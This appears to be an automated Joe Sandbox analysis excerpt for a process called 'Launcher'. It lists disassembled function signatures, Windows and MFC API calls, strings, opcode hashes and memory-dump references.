                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1165ExtractIconQueryValuelstrcpylstrlenwcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 2919050075-0
                                                                                                                • Opcode ID: 7dd199aaff6e75ee3866d3401236d30717d24844701de9088e94dcf7d11a5e8a
                                                                                                                • Instruction ID: 49e6b1090d0cc5ce274e5135c858005462aa4e90934183b82f394e51a2ff2393
                                                                                                                • Opcode Fuzzy Hash: 7dd199aaff6e75ee3866d3401236d30717d24844701de9088e94dcf7d11a5e8a
                                                                                                                • Instruction Fuzzy Hash: C4215CB6900219ABCB24EB64DC49BDA77F8EF48311F1086D9E919D7191DB709A88CB60
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B5F167
                                                                                                                • #3087.MFC42U(00001FA5,00000000), ref: 00B5F17D
                                                                                                                • #2634.MFC42U(00001FA5,00000000), ref: 00B5F184
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B5F192
                                                                                                                • #3087.MFC42U(0000009C,00000000), ref: 00B5F1A8
                                                                                                                • #2634.MFC42U(0000009C,00000000), ref: 00B5F1AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2634#3087MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 496076185-0
                                                                                                                • Opcode ID: daa3536740b9a62e87106cd317271ff38aa0fbc7549cb98ebcdfe2f2f529aae7
                                                                                                                • Instruction ID: 7e559b6d3553a80d6cb40097155dfb4a84a54426def1541990818554f28ab358
                                                                                                                • Opcode Fuzzy Hash: daa3536740b9a62e87106cd317271ff38aa0fbc7549cb98ebcdfe2f2f529aae7
                                                                                                                • Instruction Fuzzy Hash: 3FF08CB67102502BEB292B719C9AE2F299DDBC5BA1F41042DF21ADA1A1DF798D408225
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B5C4BD
                                                                                                                • #324.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C4CE
                                                                                                                • #567.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C4E5
                                                                                                                • #567.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C500
                                                                                                                • #567.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C516
                                                                                                                • #567.MFC42U(00000088,00000000,00000008,00B5BFBA,00000004), ref: 00B5C52C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #567$#324H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 3217428371-0
                                                                                                                • Opcode ID: c1cb077ca0ff3c8489cc2859db7db8d04ebf615723f75a3b105b535bc1385352
                                                                                                                • Instruction ID: b50741897349c11b0689b04162ae1319f3789fe6eeb87d7c335a24def21c77a1
                                                                                                                • Opcode Fuzzy Hash: c1cb077ca0ff3c8489cc2859db7db8d04ebf615723f75a3b105b535bc1385352
                                                                                                                • Instruction Fuzzy Hash: 84015276A11217DBEB019F9489013DCFAE0BF46700F50408EE99037381CBB85B05DBD6
                                                                                                                APIs
                                                                                                                • #693.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60A85
                                                                                                                • #609.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60A90
                                                                                                                • #609.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60A9B
                                                                                                                • #609.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60AA6
                                                                                                                • #609.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60AAE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #609$#693
                                                                                                                • String ID:
                                                                                                                • API String ID: 2192965535-0
                                                                                                                • Opcode ID: ebda58868ceaf037c12a3833d9e88055663878968f8368d305a0277949f146b2
                                                                                                                • Instruction ID: e99d71654081bae70be3618b695cda370d7d4d818d7522f534fe0bc83f019df7
                                                                                                                • Opcode Fuzzy Hash: ebda58868ceaf037c12a3833d9e88055663878968f8368d305a0277949f146b2
                                                                                                                • Instruction Fuzzy Hash: 70E04F39010612CBC276FB30C4515E9F7E1BF10341F4005BDA07B03261AF346B89CB44
                                                                                                                APIs
                                                                                                                • #1143.MFC42U(00000093,0000000E,00000093), ref: 00B5B31D
                                                                                                                • LoadIconW.USER32(00000000,00000093), ref: 00B5B323
                                                                                                                • #1165.MFC42U ref: 00B5B32B
                                                                                                                  • Part of subcall function 00B5B421: #1172.MFC42U(?,00B5B338), ref: 00B5B424
                                                                                                                • ShellAboutW.SHELL32(?,?,Developed By Charlie KindelMichael Nelson, and Michael Antonio,00000000), ref: 00B5B34B
                                                                                                                Strings
                                                                                                                • Developed By Charlie KindelMichael Nelson, and Michael Antonio, xrefs: 00B5B344
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1143#1165#1172AboutIconLoadShell
                                                                                                                • String ID: Developed By Charlie KindelMichael Nelson, and Michael Antonio
                                                                                                                • API String ID: 29937196-3714244911
                                                                                                                • Opcode ID: 38fc917df39b6b243bb0ab1a1d77afce9ead49a2ae89f64e06da52e14984409c
                                                                                                                • Instruction ID: 9c03b093b4d905e1a35087bcee337f19114f9387fbad1976803455bbdfd90111
                                                                                                                • Opcode Fuzzy Hash: 38fc917df39b6b243bb0ab1a1d77afce9ead49a2ae89f64e06da52e14984409c
                                                                                                                • Instruction Fuzzy Hash: E4E08631B0125077D6383336EC0EF5B1A9CCF81762F1108F9B806F3292DB68CC454560
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf
                                                                                                                • String ID: %s ($%08lX)$range: %s ($%08lX)$severity: %s, facility: %s ($%08lX)
                                                                                                                • API String ID: 2111968516-3060768123
                                                                                                                • Opcode ID: 30efcc7c4981be6f2d9fe9f0f7ba84f6aa3412271e554932a89c798fb9f9b045
                                                                                                                • Instruction ID: d0f51be3e19439dc8ad466c070fddf421ea49629b3c83c2cdd8b7d812c058a89
                                                                                                                • Opcode Fuzzy Hash: 30efcc7c4981be6f2d9fe9f0f7ba84f6aa3412271e554932a89c798fb9f9b045
                                                                                                                • Instruction Fuzzy Hash: 36F08C32F46234B6960137585C06DBB7ADCDE02B5278940F1FE19F7262CF589E11A2FA
                                                                                                                APIs
                                                                                                                • #1143.MFC42U(00000093,0000000E,00000093), ref: 00B5B31D
                                                                                                                • LoadIconW.USER32(00000000,00000093), ref: 00B5B323
                                                                                                                • #1165.MFC42U ref: 00B5B32B
                                                                                                                  • Part of subcall function 00B5B421: #1172.MFC42U(?,00B5B338), ref: 00B5B424
                                                                                                                • ShellAboutW.SHELL32(?,?,Developed By Charlie KindelMichael Nelson, and Michael Antonio,00000000), ref: 00B5B34B
                                                                                                                Strings
                                                                                                                • Developed By Charlie KindelMichael Nelson, and Michael Antonio, xrefs: 00B5B344
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1143#1165#1172AboutIconLoadShell
                                                                                                                • String ID: Developed By Charlie KindelMichael Nelson, and Michael Antonio
                                                                                                                • API String ID: 29937196-3714244911
                                                                                                                • Opcode ID: 8ae980f6e7ef23197ed48f4c3a1bbfdaccef2cb7b1d205101b2569487474904c
                                                                                                                • Instruction ID: 06b234a975a39a09d7db70ef309ef2a4e3cb9c72dbf6ce14caf065ebf77cbf9d
                                                                                                                • Opcode Fuzzy Hash: 8ae980f6e7ef23197ed48f4c3a1bbfdaccef2cb7b1d205101b2569487474904c
                                                                                                                • Instruction Fuzzy Hash: 61E04F717002506BD7283775ED0EF6B2AACDB81762B0204E9B806E7192DB64CC458660
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(OLE32.DLL,?,00B5E204,?,?,?), ref: 00B6DB2B
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 00B6DB3D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00B5E204,?,?,?), ref: 00B6DB52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                • String ID: CoInitializeEx$OLE32.DLL
                                                                                                                • API String ID: 145871493-3669712014
                                                                                                                • Opcode ID: ca41808f82a45e402305716357630a5e52e242afe175e60243e9d97994ebb2b4
                                                                                                                • Instruction ID: 4791a5d9bd41b3659500a3513b66e775f047b495983354da92885f141e9ad4cf
                                                                                                                • Opcode Fuzzy Hash: ca41808f82a45e402305716357630a5e52e242afe175e60243e9d97994ebb2b4
                                                                                                                • Instruction Fuzzy Hash: 01E04F31A416109FDB215F24AC0C78637E5EF11B63F850284EA18A35A0CFB88684D656
                                                                                                                APIs
                                                                                                                • #2371.MFC42U ref: 00B60917
                                                                                                                • #6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 00B6096E
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B60939
                                                                                                                  • Part of subcall function 00B5C8A6: ScreenToClient.USER32(?,?), ref: 00B5C8B7
                                                                                                                  • Part of subcall function 00B5C8A6: ScreenToClient.USER32(?,?), ref: 00B5C8C4
                                                                                                                  • Part of subcall function 00B5C8A6: #3133.MFC42U(?,?,?,00B5C46E,?), ref: 00B5C8CC
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B6098D
                                                                                                                • #6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 00B609BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6193ClientRectScreenWindow$#2371#3133
                                                                                                                • String ID:
                                                                                                                • API String ID: 3329109363-0
                                                                                                                • Opcode ID: 23e052f698bc4d89b816f3a919020cb23a879f912441f5b4e2eb55458acb9f5d
                                                                                                                • Instruction ID: 52e015355d5357ffbd02003911a762483cf68b0f1f0b851e68a205b5cf9266f3
                                                                                                                • Opcode Fuzzy Hash: 23e052f698bc4d89b816f3a919020cb23a879f912441f5b4e2eb55458acb9f5d
                                                                                                                • Instruction Fuzzy Hash: 71214D71A00209ABDB14DB79CD45FEFB7F9EF84725F040258B525A72C1DB34AA05CB20
                                                                                                                APIs
                                                                                                                • #2371.MFC42U ref: 00B5C3E7
                                                                                                                • #6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 00B5C43E
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B5C409
                                                                                                                  • Part of subcall function 00B5C8A6: ScreenToClient.USER32(?,?), ref: 00B5C8B7
                                                                                                                  • Part of subcall function 00B5C8A6: ScreenToClient.USER32(?,?), ref: 00B5C8C4
                                                                                                                  • Part of subcall function 00B5C8A6: #3133.MFC42U(?,?,?,00B5C46E,?), ref: 00B5C8CC
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00B5C45D
                                                                                                                • #6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 00B5C48F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6193ClientRectScreenWindow$#2371#3133
                                                                                                                • String ID:
                                                                                                                • API String ID: 3329109363-0
                                                                                                                • Opcode ID: aedf2b2cf483751e749c0a75945eedb105556e2e33c017c2ed3e5e2229c7e33b
                                                                                                                • Instruction ID: 1c944f63985b9a4055df9185f83fb5a21bb5b26a9f085f3a19c8c92f6df25676
                                                                                                                • Opcode Fuzzy Hash: aedf2b2cf483751e749c0a75945eedb105556e2e33c017c2ed3e5e2229c7e33b
                                                                                                                • Instruction Fuzzy Hash: 1D215E71600209AFDB14DB78CD85FEEBBF9EF88725F144258B525A7281DB34EA05CB60
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$#4692FreeLibrariesUnused
                                                                                                                • String ID:
                                                                                                                • API String ID: 1635327766-0
                                                                                                                • Opcode ID: 56d5741c95ef9ad285203d650d6fd3d5104674088eb9ba61dfded0617491c60b
                                                                                                                • Instruction ID: 25045ac360a9974f8df4f5f59f47e15e59744c31225196e7b7f54eaa548c4bd7
                                                                                                                • Opcode Fuzzy Hash: 56d5741c95ef9ad285203d650d6fd3d5104674088eb9ba61dfded0617491c60b
                                                                                                                • Instruction Fuzzy Hash: 5701D632405140DFD320EB68F899D29F7E5EBC5B22B1001AAF61EC3620CF7459C1EA55
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00B60B85
                                                                                                                • SetCursor.USER32(00000000,?,?,?,?,00B5DF45), ref: 00B60B8C
                                                                                                                  • Part of subcall function 00B60BBB: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00B60BE4
                                                                                                                  • Part of subcall function 00B60BBB: #2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00B60C33
                                                                                                                  • Part of subcall function 00B60BBB: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B60C46
                                                                                                                  • Part of subcall function 00B60BBB: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B60C57
                                                                                                                • #6330.MFC42U(00000000,?,?,?,?,00B5DF45), ref: 00B60B9C
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B60BA7
                                                                                                                • SetCursor.USER32(00000000,?,?,?,?,00B5DF45), ref: 00B60BAE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$MessageSend$Load$#2634#6330
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859525188-0
                                                                                                                • Opcode ID: 86503bf1d5e277cd7adde18d857dd7841277f86fe2fb4e7ac392e8cf041cb0e3
                                                                                                                • Instruction ID: 611affb068a3e9e609a909c6046cf9ab750dc96145ce5166dfb2a22b7450c5aa
                                                                                                                • Opcode Fuzzy Hash: 86503bf1d5e277cd7adde18d857dd7841277f86fe2fb4e7ac392e8cf041cb0e3
                                                                                                                • Instruction Fuzzy Hash: 61F030326417146B87056FE59C4DD9BBB5DEF877523000426FA2A9F152CFB99C0586E0
                                                                                                                APIs
                                                                                                                • #810.MFC42U(?,00B5D83D), ref: 00B5D7B3
                                                                                                                • #795.MFC42U(?,00B5D83D), ref: 00B5D7BE
                                                                                                                • #795.MFC42U(?,00B5D83D), ref: 00B5D7C9
                                                                                                                • #795.MFC42U(?,00B5D83D), ref: 00B5D7D4
                                                                                                                • #804.MFC42U(?,00B5D83D), ref: 00B5D7DF
                                                                                                                  • Part of subcall function 00B694F7: #810.MFC42U(?,00B5D7EF,?,00B5D83D), ref: 00B69505
                                                                                                                  • Part of subcall function 00B5C9F5: #800.MFC42U(?,00B5CA4D), ref: 00B5CA06
                                                                                                                  • Part of subcall function 00B5C9F5: #800.MFC42U(?,00B5CA4D), ref: 00B5CA11
                                                                                                                  • Part of subcall function 00B5C9F5: #656.MFC42U(?,00B5CA4D), ref: 00B5CA1C
                                                                                                                  • Part of subcall function 00B5C9F5: #609.MFC42U(?,00B5CA4D), ref: 00B5CA24
                                                                                                                  • Part of subcall function 00B5F46C: #800.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F47D
                                                                                                                  • Part of subcall function 00B5F46C: #800.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F488
                                                                                                                  • Part of subcall function 00B5F46C: #800.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F493
                                                                                                                  • Part of subcall function 00B5F46C: #800.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F49E
                                                                                                                  • Part of subcall function 00B5F46C: #616.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4A9
                                                                                                                  • Part of subcall function 00B5F46C: #656.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4B4
                                                                                                                  • Part of subcall function 00B5F46C: #609.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4BF
                                                                                                                  • Part of subcall function 00B5F46C: #609.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4CA
                                                                                                                  • Part of subcall function 00B5F46C: #804.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4D2
                                                                                                                  • Part of subcall function 00B60A74: #693.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60A85
                                                                                                                  • Part of subcall function 00B60A74: #609.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60A90
                                                                                                                  • Part of subcall function 00B60A74: #609.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60A9B
                                                                                                                  • Part of subcall function 00B60A74: #609.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60AA6
                                                                                                                  • Part of subcall function 00B60A74: #609.MFC42U(?,00B5D810,?,00B5D83D), ref: 00B60AAE
                                                                                                                  • Part of subcall function 00B5C53F: #693.MFC42U(?,00B5C5BD), ref: 00B5C550
                                                                                                                  • Part of subcall function 00B5C53F: #609.MFC42U(?,00B5C5BD), ref: 00B5C55B
                                                                                                                  • Part of subcall function 00B5C53F: #609.MFC42U(?,00B5C5BD), ref: 00B5C566
                                                                                                                  • Part of subcall function 00B5C53F: #609.MFC42U(?,00B5C5BD), ref: 00B5C56E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #609$#800$#795$#656#693#804#810$#616
                                                                                                                • String ID:
                                                                                                                • API String ID: 1443703491-0
                                                                                                                • Opcode ID: 664564a3a2e505e4640046fc49131ec0d5b819741659db4c58cd7d6562610c04
                                                                                                                • Instruction ID: 9dd4d36bde4b7de60c6337ea6bc14d043411cd6541f8a37fd199b64afe4a88e4
                                                                                                                • Opcode Fuzzy Hash: 664564a3a2e505e4640046fc49131ec0d5b819741659db4c58cd7d6562610c04
                                                                                                                • Instruction Fuzzy Hash: 7DF0AF354146528AC338FB70D4916EEB3E1BF64351F9045EDA4BF02152AF787909CF80
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#609#656
                                                                                                                • String ID:
                                                                                                                • API String ID: 1737153938-0
                                                                                                                • Opcode ID: 09f7fbdb36d0fdf3af25d079bf878102d05fbb2a37653fdeac0668be7d65acc9
                                                                                                                • Instruction ID: bc87c58b7bb9af94f3166cc1b85aaf12cb9fd52e2abd346c394aee121f04b413
                                                                                                                • Opcode Fuzzy Hash: 09f7fbdb36d0fdf3af25d079bf878102d05fbb2a37653fdeac0668be7d65acc9
                                                                                                                • Instruction Fuzzy Hash: 1CE01236540511CBC335FB20D592AE9B7D1AF65311F5009BEE5A703591AF746A49CB40
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00B5B468
                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00B5B479
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                • API String ID: 1646373207-3460614246
                                                                                                                • Opcode ID: b43555d3472996d248fc14d34ec9cce4ee5040c8ded12eb46c6adbf7d69e481e
                                                                                                                • Instruction ID: 3070ff6a61116be00c9c33010da412632b1039f4eb6615d6b3ff881e2eb0cf25
                                                                                                                • Opcode Fuzzy Hash: b43555d3472996d248fc14d34ec9cce4ee5040c8ded12eb46c6adbf7d69e481e
                                                                                                                • Instruction Fuzzy Hash: 73D01770B412256ADB6127B57C4CF6B2DEEDB00B9370008D0BD0AD32A1CFA08C848AA2
                                                                                                                APIs
                                                                                                                • #861.MFC42U(?,00000001), ref: 00B639C4
                                                                                                                • #6325.MFC42U(?,00000001,00000000), ref: 00B63A4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6325#861
                                                                                                                • String ID:
                                                                                                                • API String ID: 3876780826-0
                                                                                                                • Opcode ID: 11bf13d6e1278e883347fa8d04caa06448ac0471fcfa477630d40235be1b85f5
                                                                                                                • Instruction ID: 52fcaeebefff8b4e1a3f372b6bf54358ee216b2c3aac4b6c7328b71b024fa189
                                                                                                                • Opcode Fuzzy Hash: 11bf13d6e1278e883347fa8d04caa06448ac0471fcfa477630d40235be1b85f5
